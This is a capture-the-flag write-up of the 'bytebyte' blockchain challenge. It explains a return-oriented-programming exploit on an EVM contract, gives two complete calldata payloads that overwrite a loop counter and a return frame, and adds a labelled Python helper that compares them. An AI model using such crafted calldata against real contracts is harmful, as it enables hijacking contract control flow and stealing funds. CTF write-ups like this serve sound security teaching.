qwb2022 6th Qiangwang Cup Online Round, Blockchain: bytebyte

Preface

  • Write-up for the bytebyte challenge from the 6th qwb offline finals
  • Congratulations to the team from the University of Science and Technology of China on first blood
  • The topic being tested is Return Oriented Programming
  • It is a revenge of EGM; for the stack details see https://hitcxy.com/2020/egm/
  • Compared with EGM, bytebyte moves the position of the loop variable. The loop variable is a range of values: in my original design, if the calldata length is 4+32*11 bytes this value is fixed, which effectively lets the loop variable act as a fixed canary. However, a shorter calldata cannot be ruled out, so the challenge is designed to compare the numeric value of the calldata.

Source

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

Analysis

  • The challenge copies calldata[24:] to memory position 0x140. The 0x9f here is the loop counter, and it is a variable: it must both overwrite 0x2f5 (the position of the returned stack frame) and let the copy loop terminate normally, so it is a range of values. The minimal calldata the challenge sets up is shown below (the size comparison sets msg.sender to 0, so it has no effect).
data = '0x8d715d9d'  # function selector
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000260'
data += '00000000000000000000000000000000000000000000000000000000000002f5'  # returned stack frame position
data += '0000000000000000000000000000000000000000000000000000000000013000'
data += '000000000000000000000000000000000000000000000000000000000000009f'  # loop counter (a range value)
data += '0000000000000000000000000000000000000000000000000000000000000140'
data += '0000000000000000000000000000000000000000000000000000000000000140'
data += '000000000000000000000000000000000000000000000000000000000000034f'
data += '0000000000000000000000000000000000000000000000000000000000000066'
data += '000000000000000000000000715e68C887512022164b9f3F28439e9d12FFF5e1'  # address, left-padded to 32 bytes
  • The first-blood team's calldata is shorter and more elegant: by overwriting the loop counter i with its terminating value, the data after the loop counter is never used again, so it no longer needs to be avoided. At that point simply using offsets beyond 0x13000 lets the ROP chain execute normally, which saves two words, as shown below.
data = '0x8d715d9d'  # function selector
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '00000000000000000000000000000000000000000000000000000000000130e0'
data += '00000000000000000000000000000000000000000000000000000000000002f5'  # returned stack frame position
data += '0000000000000000000000000000000000000000000000000000000000013000'
data += '00000000000000000000000000000000000000000000000000000000000000ff'  # loop counter set to its terminating value
data += '000000000000000000000000000000000000000000000000000000000000034f'
data += '0000000000000000000000000000000000000000000000000000000000000066'
data += '0000000000000000000000000123456789012345678901234567890123456789'  # address, left-padded to 32 bytes
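To check the claim that the first-blood payload is simply the original with the two words after the loop counter dropped, here is an added helper (not part of the original write-up) that encodes both calldata layouts from the values quoted above, decodes them back into selector plus 32-byte words, and diffs them. The word indices and the assumption that exactly two words are removed right after the counter are mine.

```python
SELECTOR = "8d715d9d"  # function selector from the payloads above (without 0x)


def build_calldata(selector: str, words: list[int]) -> bytes:
    """ABI-style layout: 4-byte selector followed by 32-byte big-endian words."""
    out = bytes.fromhex(selector)
    for w in words:
        if not 0 <= w < 2**256:
            raise ValueError(f"word does not fit in 256 bits: {w:#x}")
        out += w.to_bytes(32, "big")
    return out


def decode_calldata(data: bytes) -> tuple[str, list[int]]:
    """Split calldata back into selector and words; reject ragged trailing bytes."""
    if len(data) < 4 or (len(data) - 4) % 32:
        raise ValueError(f"unexpected calldata length {len(data)}")
    words = [int.from_bytes(data[i:i + 32], "big") for i in range(4, len(data), 32)]
    return data[:4].hex(), words


# The two payloads from the write-up, as integers instead of hex strings.
LONG_WORDS = [0, 0, 0x260, 0x2f5, 0x13000, 0x9f, 0x140, 0x140, 0x34f, 0x66,
              0x715e68C887512022164b9f3F28439e9d12FFF5e1]
SHORT_WORDS = [0, 0, 0x130e0, 0x2f5, 0x13000, 0xff, 0x34f, 0x66,
               0x0123456789012345678901234567890123456789]

LOOP_COUNTER_IDX = 5  # word carrying the loop-counter value (0x9f vs 0xff)
RET_FRAME_IDX = 3     # word that overwrites the 0x2f5 return frame position


def diff_words(a: list[int], b: list[int]) -> list[tuple[int, int, int]]:
    """Positions where two word lists differ, as (index, a_value, b_value)."""
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]


def words_dropped_after_counter(long: list[int], short: list[int]) -> list[int]:
    """Assumption: `short` is `long` with two words removed right after the loop
    counter. Return those two words, or [] if the tails do not line up
    (the trailing address is excluded, since it differs per sender)."""
    tail_long = long[LOOP_COUNTER_IDX + 3:]
    tail_short = short[LOOP_COUNTER_IDX + 1:]
    if tail_long[:-1] != tail_short[:-1]:
        return []
    return long[LOOP_COUNTER_IDX + 1:LOOP_COUNTER_IDX + 3]
```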
---------------- The End ----------------
Thank you, kind sir~

Author:pikachu
Link:https://hitcxy.com/2022/bytebyte/
Contact:hitcxy.cn@gmail.com
This article is published under the Creative Commons Attribution-ShareAlike 4.0 International License.
Please credit the source when reposting, thank you!